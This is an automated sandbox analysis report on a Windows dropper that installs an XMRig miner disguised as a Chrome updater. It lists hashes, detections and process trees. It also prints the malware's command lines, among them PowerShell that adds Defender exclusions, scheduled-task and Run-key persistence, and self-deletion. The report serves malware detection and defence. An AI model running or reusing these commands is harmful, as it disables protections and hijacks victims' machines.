Overview
overview
10Static
static
3grhsghsGHs...y8.exe
windows7-x64
10grhsghsGHs...y8.exe
windows10-2004-x64
10grhsghsGHs...SE.exe
windows7-x64
10grhsghsGHs...SE.exe
windows10-2004-x64
10grhsghsGHs...CD.exe
windows7-x64
10grhsghsGHs...CD.exe
windows10-2004-x64
10grhsghsGHs...Da.exe
windows7-x64
10grhsghsGHs...Da.exe
windows10-2004-x64
10grhsghsGHs...wq.exe
windows7-x64
10grhsghsGHs...wq.exe
windows10-2004-x64
10grhsghsGHs...r7.exe
windows7-x64
10grhsghsGHs...r7.exe
windows10-2004-x64
10grhsghsGHs...XJ.exe
windows7-x64
10grhsghsGHs...XJ.exe
windows10-2004-x64
10grhsghsGHs...eg.exe
windows7-x64
10grhsghsGHs...eg.exe
windows10-2004-x64
10grhsghsGHs...5H.exe
windows7-x64
10grhsghsGHs...5H.exe
windows10-2004-x64
10grhsghsGHs...XN.exe
windows7-x64
10grhsghsGHs...XN.exe
windows10-2004-x64
10grhsghsGHs...T3.exe
windows7-x64
10grhsghsGHs...T3.exe
windows10-2004-x64
10grhsghsGHs...9r.exe
windows7-x64
10grhsghsGHs...9r.exe
windows10-2004-x64
10grhsghsGHs...GR.exe
windows7-x64
10grhsghsGHs...GR.exe
windows10-2004-x64
10grhsghsGHs...EX.exe
windows7-x64
10grhsghsGHs...EX.exe
windows10-2004-x64
10grhsghsGHs...EA.exe
windows7-x64
10grhsghsGHs...EA.exe
windows10-2004-x64
10grhsghsGHs...FB.exe
windows7-x64
10grhsghsGHs...FB.exe
windows10-2004-x64
10Resubmissions
25-01-2024 16:55
240125-vfcyksbhgr 1024-01-2024 17:15
240124-vstf4aecaj 1023-01-2024 19:27
240123-x6cfvagbd9 1023-01-2024 19:27
240123-x6bvbafgem 1023-01-2024 19:27
240123-x6bjjsgbd8 1023-01-2024 19:27
240123-x6ax1sfgek 1023-01-2024 19:27
240123-x6abgsfgej 1023-01-2024 19:27
240123-x591qagbd7 1023-01-2024 19:27
240123-x59d7agbd6 1023-01-2024 19:27
240123-x584esgbd5 10Analysis
-
max time kernel
419s -
max time network
1797s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
23-01-2024 19:27
Static task
static1
Behavioral task
behavioral1
Sample
grhsghsGHswgh/3JynzWc6LxNCT2y8.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
grhsghsGHswgh/3JynzWc6LxNCT2y8.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral3
Sample
grhsghsGHswgh/6aNn9vLJCQVfagSE.exe
Resource
win7-20231215-en
Behavioral task
behavioral4
Sample
grhsghsGHswgh/6aNn9vLJCQVfagSE.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral5
Sample
grhsghsGHswgh/6vHkJ4UErTSS5ECD.exe
Resource
win7-20231215-en
Behavioral task
behavioral6
Sample
grhsghsGHswgh/6vHkJ4UErTSS5ECD.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral7
Sample
grhsghsGHswgh/Be5sCbvuma2nkHDa.exe
Resource
win7-20231215-en
Behavioral task
behavioral8
Sample
grhsghsGHswgh/Be5sCbvuma2nkHDa.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral9
Sample
grhsghsGHswgh/DLKFnAGYJBNTnxwq.exe
Resource
win7-20231215-en
Behavioral task
behavioral10
Sample
grhsghsGHswgh/DLKFnAGYJBNTnxwq.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral11
Sample
grhsghsGHswgh/EtPLMpbCyFJpMJr7.exe
Resource
win7-20231215-en
Behavioral task
behavioral12
Sample
grhsghsGHswgh/EtPLMpbCyFJpMJr7.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral13
Sample
grhsghsGHswgh/Gu3PdXt79NF7EJXJ.exe
Resource
win7-20231215-en
Behavioral task
behavioral14
Sample
grhsghsGHswgh/Gu3PdXt79NF7EJXJ.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral15
Sample
grhsghsGHswgh/JqLvG94UkYjhxAeg.exe
Resource
win7-20231215-en
Behavioral task
behavioral16
Sample
grhsghsGHswgh/JqLvG94UkYjhxAeg.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral17
Sample
grhsghsGHswgh/LM3BR4UBmKBzBP5H.exe
Resource
win7-20231215-en
Behavioral task
behavioral18
Sample
grhsghsGHswgh/LM3BR4UBmKBzBP5H.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral19
Sample
grhsghsGHswgh/M8xUNW42QxTLMRXN.exe
Resource
win7-20231129-en
Behavioral task
behavioral20
Sample
grhsghsGHswgh/M8xUNW42QxTLMRXN.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral21
Sample
grhsghsGHswgh/Q5EUCWHU7pMYBfT3.exe
Resource
win7-20231215-en
Behavioral task
behavioral22
Sample
grhsghsGHswgh/Q5EUCWHU7pMYBfT3.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral23
Sample
grhsghsGHswgh/UMRsPGc4u9tycx9r.exe
Resource
win7-20231215-en
Behavioral task
behavioral24
Sample
grhsghsGHswgh/UMRsPGc4u9tycx9r.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral25
Sample
grhsghsGHswgh/UU4Ddwqm5zcuLzGR.exe
Resource
win7-20231215-en
Behavioral task
behavioral26
Sample
grhsghsGHswgh/UU4Ddwqm5zcuLzGR.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral27
Sample
grhsghsGHswgh/XJEzW6M7WvHaF3EX.exe
Resource
win7-20231215-en
Behavioral task
behavioral28
Sample
grhsghsGHswgh/XJEzW6M7WvHaF3EX.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral29
Sample
grhsghsGHswgh/Y2JYGshMHJGuGREA.exe
Resource
win7-20231129-en
Behavioral task
behavioral30
Sample
grhsghsGHswgh/Y2JYGshMHJGuGREA.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral31
Sample
grhsghsGHswgh/Yvdp8t5knpQz7sFB.exe
Resource
win7-20231215-en
General
-
Target
grhsghsGHswgh/Y2JYGshMHJGuGREA.exe
-
Size
2.0MB
-
MD5
a16a669a09bf158058b83e04e69fe38e
-
SHA1
f6c94763850d9e590d86057139e8895a7aacdeea
-
SHA256
cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e
-
SHA512
658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6
-
SSDEEP
49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs
description pid Process procid_target PID 2932 created 1216 2932 Y2JYGshMHJGuGREA.exe 10 PID 2932 created 1216 2932 Y2JYGshMHJGuGREA.exe 10 PID 2932 created 1216 2932 Y2JYGshMHJGuGREA.exe 10 PID 2932 created 1216 2932 Y2JYGshMHJGuGREA.exe 10 PID 2984 created 1216 2984 updater.exe 10 PID 2984 created 1216 2984 updater.exe 10 PID 2984 created 1216 2984 updater.exe 10 PID 2984 created 1216 2984 updater.exe 10 PID 2984 created 1216 2984 updater.exe 10 -
XMRig Miner payload 29 IoCs
resource yara_rule behavioral29/memory/2460-72-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2460-74-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2460-78-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2460-80-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2460-82-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2460-84-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2460-86-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2460-88-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2460-95-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2460-97-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2460-99-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2460-101-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2460-103-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2460-105-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2460-107-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2460-109-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2460-111-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2460-113-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2460-115-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2460-117-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2460-119-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2460-126-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2460-128-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2460-130-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2460-132-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2460-134-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2460-136-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2460-138-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2460-140-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig -
Deletes itself 1 IoCs
pid Process 2516 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 2984 updater.exe -
Loads dropped DLL 1 IoCs
pid Process 2960 taskeng.exe -
resource yara_rule behavioral29/memory/2460-68-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2460-72-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2460-74-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2460-78-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2460-80-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2460-82-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2460-84-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2460-86-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2460-88-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2460-95-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2460-97-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2460-99-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2460-101-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2460-103-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2460-105-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2460-107-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2460-109-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2460-111-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2460-113-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2460-115-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2460-117-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2460-119-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2460-126-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2460-128-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2460-130-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2460-132-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2460-134-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2460-136-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2460-138-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2460-140-0x0000000140000000-0x00000001407F4000-memory.dmp upx -
Drops file in System32 directory 5 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2984 set thread context of 2952 2984 updater.exe 53 PID 2984 set thread context of 2460 2984 updater.exe 48 -
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe Y2JYGshMHJGuGREA.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2592 schtasks.exe 2720 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2948 WMIC.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 10f37f0dbc4fda01 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe -
Suspicious behavior: EnumeratesProcesses 25 IoCs
pid Process 2932 Y2JYGshMHJGuGREA.exe 2932 Y2JYGshMHJGuGREA.exe 3048 powershell.exe 2932 Y2JYGshMHJGuGREA.exe 2932 Y2JYGshMHJGuGREA.exe 2668 powershell.exe 2932 Y2JYGshMHJGuGREA.exe 2932 Y2JYGshMHJGuGREA.exe 2932 Y2JYGshMHJGuGREA.exe 2932 Y2JYGshMHJGuGREA.exe 2500 powershell.exe 2984 updater.exe 2984 updater.exe 1964 powershell.exe 2984 updater.exe 2984 updater.exe 1460 powershell.exe 2984 updater.exe 2984 updater.exe 2984 updater.exe 2984 updater.exe 2952 conhost.exe 2952 conhost.exe 2984 updater.exe 2984 updater.exe -
Suspicious use of AdjustPrivilegeToken 31 IoCs
description pid Process Token: SeDebugPrivilege 3048 powershell.exe Token: SeDebugPrivilege 2668 powershell.exe Token: SeDebugPrivilege 2500 powershell.exe Token: SeDebugPrivilege 1964 powershell.exe Token: SeDebugPrivilege 1460 powershell.exe Token: SeDebugPrivilege 2984 updater.exe Token: SeAssignPrimaryTokenPrivilege 2948 WMIC.exe Token: SeIncreaseQuotaPrivilege 2948 WMIC.exe Token: SeSecurityPrivilege 2948 WMIC.exe Token: SeTakeOwnershipPrivilege 2948 WMIC.exe Token: SeLoadDriverPrivilege 2948 WMIC.exe Token: SeSystemtimePrivilege 2948 WMIC.exe Token: SeBackupPrivilege 2948 WMIC.exe Token: SeRestorePrivilege 2948 WMIC.exe Token: SeShutdownPrivilege 2948 WMIC.exe Token: SeSystemEnvironmentPrivilege 2948 WMIC.exe Token: SeUndockPrivilege 2948 WMIC.exe Token: SeManageVolumePrivilege 2948 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 2948 WMIC.exe Token: SeIncreaseQuotaPrivilege 2948 WMIC.exe Token: SeSecurityPrivilege 2948 WMIC.exe Token: SeTakeOwnershipPrivilege 2948 WMIC.exe Token: SeLoadDriverPrivilege 2948 WMIC.exe Token: SeSystemtimePrivilege 2948 WMIC.exe Token: SeBackupPrivilege 2948 WMIC.exe Token: SeRestorePrivilege 2948 WMIC.exe Token: SeShutdownPrivilege 2948 WMIC.exe Token: SeSystemEnvironmentPrivilege 2948 WMIC.exe Token: SeUndockPrivilege 2948 WMIC.exe Token: SeManageVolumePrivilege 2948 WMIC.exe Token: SeLockMemoryPrivilege 2460 conhost.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 2668 wrote to memory of 2592 2668 powershell.exe 32 PID 2668 wrote to memory of 2592 2668 powershell.exe 32 PID 2668 wrote to memory of 2592 2668 powershell.exe 32 PID 2516 wrote to memory of 2588 2516 cmd.exe 34 PID 2516 wrote to memory of 2588 2516 cmd.exe 34 PID 2516 wrote to memory of 2588 2516 cmd.exe 34 PID 2500 wrote to memory of 2772 2500 powershell.exe 39 PID 2500 wrote to memory of 2772 2500 powershell.exe 39 PID 2500 wrote to memory of 2772 2500 powershell.exe 39 PID 2960 wrote to memory of 2984 2960 taskeng.exe 40 PID 2960 wrote to memory of 2984 2960 taskeng.exe 40 PID 2960 wrote to memory of 2984 2960 taskeng.exe 40 PID 1460 wrote to memory of 2720 1460 powershell.exe 45 PID 1460 wrote to memory of 2720 1460 powershell.exe 45 PID 1460 wrote to memory of 2720 1460 powershell.exe 45 PID 2984 wrote to memory of 2952 2984 updater.exe 53 PID 648 wrote to memory of 2948 648 cmd.exe 47 PID 648 wrote to memory of 2948 648 cmd.exe 47 PID 648 wrote to memory of 2948 648 cmd.exe 47 PID 2984 wrote to memory of 2460 2984 updater.exe 48 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1216
-
C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Y2JYGshMHJGuGREA.exe"C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Y2JYGshMHJGuGREA.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:2932
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3048
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2668 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:2592
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Y2JYGshMHJGuGREA.exe"2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2516
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2500 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵PID:2772
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1964
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1460 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:2720
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2460
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
PID:1212
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe qtdiqnkejoz2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2952
-
-
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 31⤵PID:2588
-
C:\Windows\system32\taskeng.exetaskeng.exe {BFA7C091-C6BD-433F-9BCB-1089BA33DB4F} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2960 -
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2984
-
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor1⤵
- Detects videocard installed
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2948
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"1⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:648
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
369KB
MD5571df8ec355959047880afdd783eba2c
SHA1d45c7ed201b044dfa6e3336154cc670a80f5b30c
SHA25606a374110e220cfcaf2e1df450700b7f1c9f78b4c56bccf62e448ac248effc44
SHA5127ba02c952434419db09e289f368d9f58fe1cde6a88f6aae2511023d0592ff7ec8c938848d3c0727ec27a4b814b19d180cd0b3aeb80a5573402646d2f2b73ee53
-
Filesize
394KB
MD51d0fa87c096899fc63c4b4c693b73ee2
SHA1baafecfef120fb4807b977be79547ecc77a98a7f
SHA2569b0362c8910531a737d14a5ae8da00d44b576cdd0d75b136cc050ccb1d738cb2
SHA5122983acf173fffe47b83080b0beed83a8856d57e92d168567c726c523eb8d3cf8fa876f3be4de92ed85d50b60a0ebe64030f8b884df651dccc25d22a82d2ae6cc
-
Filesize
198B
MD537dd19b2be4fa7635ad6a2f3238c4af1
SHA1e5b2c034636b434faee84e82e3bce3a3d3561943
SHA2568066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07
SHA51286e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RTPPREPW3GCILH7SU1YC.temp
Filesize7KB
MD564da943842968e4aa7d9d603f630dfa5
SHA1f4f660e7c469d55eb7b98d03a5964db12d60bff4
SHA25607405d07bbc71e5b353fbc692bcd56bade1bdaa6e5b58cb8f07c09a18a01e313
SHA5128c6a3c07bedf3cf63b10797838fc85e398b8129b4b3b6980780e5fbd308524025972c90132ca58339cc5b53ebb503c72ae2863e35840cd6519b3581aa5b7deca
-
Filesize
398KB
MD57147367d1d1732db1a74d591de51634a
SHA1977dc6608ece4215e7a32b811772256d08823570
SHA256cbc1717162ad89ad95a7be198ed93739f5246a462d9182ac9460c395246a14b0
SHA5122e3f9aa277afe4f64650c136e141887895cf0cdc8a7491dcb0f0d7796b1acea990e0e59f16b5f9436a97787af82297446b7b01543f7ac36e8d821cf6654f31bc